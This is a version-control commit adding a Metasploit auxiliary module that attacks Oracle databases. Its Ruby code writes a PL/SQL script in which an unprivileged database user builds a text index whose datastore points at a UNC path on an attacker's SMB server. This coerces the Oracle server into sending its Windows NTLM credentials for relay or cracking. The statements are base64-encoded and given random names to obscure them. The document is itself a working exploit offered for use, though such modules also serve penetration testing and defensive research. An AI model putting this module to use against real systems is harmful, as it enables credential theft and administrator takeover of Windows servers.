added auxiliary module ora_ntlm_stealer.rb from Sh2kerr

git-svn-id: file:///home/svn/framework3/trunk@6464 4d416f70-5f16-0410-b530-b9f4589650da

modules/auxiliary/admin/oracle/ora_ntlm_stealer.rb

@@ -0,0 +1,80 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+	include Msf::Exploit::FILEFORMAT
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Owning Windows server using Oracle database unpivileged user',
+			'Description'    => %q{
+					This module will help you to get Administrator access to OS using unprivileged Oracle database user (you need only CONNECT and RESOURCE privileges)
+					To do this you must firstly run smb_sniffer of smb_relay module on your sever. Then you must connect to
+					Oracle database and run this module Ora_NTLM_stealer.rb  which will connect to your SMB sever with credentials of Oracle RDBMS.
+					So if smb_relay is working you  will get Administrators access to server which runs Oracle of not than you can decrypt HALFLM hash. 
+			},
+			'Author'         => [ 'Sh2kerr <research[ad]dsecrg.com>' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision:$',
+			'References'     =>
+				[
+					
+					[ 'URL', 'http://dsecrg.com/pages/pub/show.php?id=17' ],
+					
+				],
+			'DisclosureDate' => 'April 7 2009'))
+
+			register_options( 
+				[
+					OptString.new('IP',         [ false, 'IP adress of SMB proxy.',  '0.0.0.0']),
+					OptString.new('FILENAME',   [ false, 'The file name.',  'msf.sql']),
+					OptString.new('OUTPUTPATH', [ false, 'The location of the file.',  './data/exploits/']),
+				
+				], self.class)
+	end
+
+	def run
+		name1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+		name2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+		rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+		rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+		rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+		
+		prepare  = "CREATE TABLE #{name1} (id NUMBER PRIMARY KEY,path VARCHAR(255) UNIQUE,col_format VARCHAR(6))"
+		prepare1 = "INSERT INTO #{name1} VALUES (1, '\\\\#{datastore['IP']}\\SHARE', NULL)"
+		
+		exploiting1 = "CREATE INDEX #{name2} ON #{name1}(path) INDEXTYPE IS ctxsys.context PARAMETERS ('datastore ctxsys.file_datastore format column col_format')"
+		
+		prp  = Rex::Text.encode_base64(prepare)
+		prp1 = Rex::Text.encode_base64(prepare1)
+		exp1 = Rex::Text.encode_base64(exploiting1)
+		
+		sql = %Q|
+			DECLARE
+			#{rand1} VARCHAR2(32767);
+			#{rand2} VARCHAR2(32767);
+			#{rand3} VARCHAR2(32767);
+			BEGIN
+			#{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp}')));
+			EXECUTE IMMEDIATE #{rand1};
+			#{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{prp1}')));
+			EXECUTE IMMEDIATE #{rand2};
+			#{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{exp1}')));
+			EXECUTE IMMEDIATE #{rand3};
+			END;
+			/
+			|
+
+		print_status("Creating '#{datastore['FILENAME']}' file ...")		
+		file_create(sql)
+
+	end
+
+end